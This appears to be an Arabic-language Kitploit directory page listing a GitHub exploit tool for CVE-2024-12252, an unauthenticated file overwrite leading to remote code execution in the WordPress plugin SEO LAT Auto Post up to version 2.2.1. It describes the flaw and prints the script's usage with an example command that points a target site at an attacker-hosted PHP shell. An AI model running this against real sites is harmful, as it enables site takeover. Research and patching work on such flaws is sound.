Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-12252 — SEO LAT Auto Post <= 2.2.1 - غياب التفويض لاستبدال/رفع الملفات (تنفيذ أكواد عن بُعد) | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2024-12252
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقأداة الوصول عن بعد
GitHubnxploited/cve-2024-12252

CVE-2024-12252

SEO LAT Auto Post <= 2.2.1 - غياب التفويض لاستبدال/رفع الملفات (تنفيذ أكواد عن بُعد)

عرض المستودع
13منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

SEO LAT Auto Post <= 2.2.1 - تنفيذ التعليمات البرمجية عن بُعد

الوصف

إن إضافة SEO LAT Auto Post لووردبريس عرضة لاستبدال الملفات بسبب غياب فحص الصلاحيات في إجراء AJAX باسم remote_update في جميع الإصدارات حتى 2.2.1 وما يتضمنه. وهذا يتيح للمهاجمين غير المصادَق عليهم استبدال الملف seo-beginner-auto-post.php، والذي يمكن استغلاله لتحقيق تنفيذ التعليمات البرمجية عن بُعد.

تفاصيل الثغرة

  • CVE: CVE-2024-12252
  • درجة CVSS: 9.8 (حرجة)

الاستغلال

يستغل هذا السكربت الثغرة الأمنية في إضافة SEO LAT Auto Post لتحقيق تنفيذ التعليمات البرمجية عن بُعد من خلال استبدال الملف seo-beginner-auto-post.php. يقوم السكربت بأتمتة عملية فحص إصدار الإضافة، وتشغيل الاستغلال، وتوفير صدفة تفاعلية لتنفيذ الأوامر.

الاستخدام

root@kitploit:~
usage: CVE-2024-12252.py [-h] -u URL --attack-url ATTACK_URL

CVE-2024-12252 | SEO LAT Auto Post <= 2.2.1 - Remote Code Execution # by: By Nxploit | Khaled Alenazi

options:
-h, --help            show this help message and exit
-u, --url URL         Target base URL (e.g., http://example.com/wordpress)
--attack-url ATTACK_URL
                      Direct URL to your malicious PHP shell

شغّل السكربت باستخدام عنوان الهدف وعنوان ملف الـ PHP الخبيث الخاص بك:

root@kitploit:~
python CVE-2024-12252.py -u http://example.com/wordpress --attack-url http://yourserver.com/shell.php

المراجع

  • Wordfence Intelligence
  • CVE-2024-12252
تنزيل الأداة